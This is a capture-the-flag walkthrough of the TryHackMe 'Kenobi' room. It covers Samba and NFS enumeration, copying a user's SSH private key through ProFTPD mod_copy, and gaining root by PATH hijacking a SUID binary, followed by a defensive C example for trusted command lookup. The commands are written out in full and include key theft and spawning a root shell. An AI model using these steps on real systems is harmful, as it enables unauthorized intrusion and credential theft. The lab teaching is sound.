# Red Team Training Series : Kenobi
###### tags: `cybersecurity` `exploit` `samba` `tutorials`
Walkthrough for the Kenobi room on TryHackMe (THM).
## Enumerating Samba for shares
Samba is the standard Windows interoperability suite of programs for Linux and Unix.
It allows end users to access and use files, printers, and other commonly shared resources on a company's intranet or over the internet.
It is commonly referred to as a network file system.
Samba is based on the common **client/server protocol SMB**.
Without Samba, other computer platforms would be isolated from Windows machines even if they were part of the same network.
We can use nmap to enumerate a machine for Samba shares and users.
syntax: **nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [ip]**

SMB uses two ports:
* Port 139: SMB originally ran on top of NetBIOS using port 139. NetBIOS is an older transport layer that allows Windows computers to talk to each other on the same network.
* Port 445: Versions of SMB after Windows 2000 began to use port 445 directly on top of a TCP stack. Using TCP allows SMB to work over the internet.
rpcbind is a service that converts RPC (Remote Procedure Call) program numbers into universal addresses.
When an RPC service starts, it tells rpcbind the address at which it is listening and the RPC program number it is prepared to serve.
We inspect a share with smbclient.
syntax: **smbclient //[ip]/[share]**

We download the share recursively to look through files of interest.
syntax: **smbget -R smb://[ip]/[share]**

In our case, port 111, running rpcbind, gives access to a network file system (NFS).
We use nmap to enumerate it:
syntax: **nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [ip]**

From this we see that the /var mount is accessible.
## Gain initial access with proftpd
ProFTPD is a free and open-source FTP server, compatible with Unix and Windows systems.
To get the ProFTPD version, we grab its banner with netcat.
syntax: **nc [ip] [port]**
Then we look up known vulnerabilities for that version using searchsploit.
syntax: **searchsploit proftpd [version]**

We find that the **mod_copy** module implements the **SITE CPFR** and **SITE CPTO** commands, which copy files or directories from one place to another on the server.
Any unauthenticated client can use these commands to copy files from any part of the filesystem to a chosen destination.
We copy kenobi's private key using mod_copy:
1. SITE CPFR /home/kenobi/.ssh/id_rsa
2. SITE CPTO /var/tmp/id_rsa

We choose /var/tmp as the destination because we identified the /var folder as accessible over NFS earlier on.
We mount the /var directory on our machine.
syntax: **mount [ip]:/[directory] [destination path]**
With the network mount on our machine, we go into the mounted var directory and retrieve the copied SSH key.

Log in as kenobi with the SSH key after restricting the key file's permissions to owner-only access (ssh refuses private keys readable by other users).
**chmod 600 id_rsa**
**ssh kenobi@[ip] -i id_rsa**

## Privilege escalation with PATH variable manipulation
The SUID bit allows a program to be executed with the permissions of the file owner rather than the user running it.
Custom files with the SUID bit set are great for compromising systems.
To search a system for SUID files use:
**find / -perm -u=s -type f 2>/dev/null**

One of the results, /usr/bin/menu, is a SUID root binary that calls curl without a full path, so it is located through the caller's PATH variable.
Leveraging this, we set our own PATH (working from /tmp):
* **echo /bin/sh > curl**
* **chmod 777 curl**
* **export PATH=/tmp:$PATH**
* **/usr/bin/menu**
We create a file called curl that launches /bin/sh, make it executable, and put its location at the front of our PATH.
When we run /usr/bin/menu it uses our PATH variable to find the curl binary, which actually runs a root shell :)
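The root cause on the defensive side is a privileged program trusting a caller-controlled PATH. The following is an added hardening example (not code from the room or the menu binary) showing how a SUID program should resolve a helper command: only against a fixed list of trusted directories, and only if the name is a bare command name. The trusted-directory list is an assumption for this example.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>

/* Assumed trusted, root-owned directories for this example. A SUID
 * program resolves helpers here instead of consulting the inherited
 * PATH, so an attacker's /tmp entry is never searched. */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", "/usr/sbin", "/sbin" };

/* Resolve a bare command name (e.g. "curl") to an absolute path inside
 * TRUSTED_DIRS. Returns 0 and fills `out` on success; returns -1 if the
 * name is empty, contains a '/', or is not an executable regular file in
 * any trusted directory. The caller would then execve() the result with
 * a sanitized environment rather than calling system("curl ..."). */
int resolve_trusted(const char *name, char *out, size_t outlen)
{
    struct stat st;
    size_t i;

    /* "/tmp/curl" or "../tmp/curl" are never valid helper names. */
    if (name == NULL || name[0] == '\0' || strchr(name, '/') != NULL)
        return -1;

    for (i = 0; i < sizeof(TRUSTED_DIRS) / sizeof(TRUSTED_DIRS[0]); i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], name);
        if (n < 0 || (size_t)n >= outlen)
            return -1;
        /* Only accept a regular file with the owner-execute bit set. */
        if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & S_IXUSR))
            return 0;
    }
    out[0] = '\0';
    return -1;
}

int main(void)
{
    char path[256];
    const char *cmds[] = { "curl", "sh", "../tmp/curl", "/tmp/curl" };
    size_t i;
    for (i = 0; i < sizeof(cmds) / sizeof(cmds[0]); i++) {
        if (resolve_trusted(cmds[i], path, sizeof path) == 0)
            printf("%-12s -> %s\n", cmds[i], path);
        else
            printf("%-12s -> rejected\n", cmds[i]);
    }
    return 0;
}
```

With this lookup, prepending /tmp to PATH has no effect on which curl the privileged program runs.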

### Where are the pictures?
Well, funny story: I mounted the share to the working folder where I was saving my work, then killed the VM before exporting the files.
Don't make my mistakes :)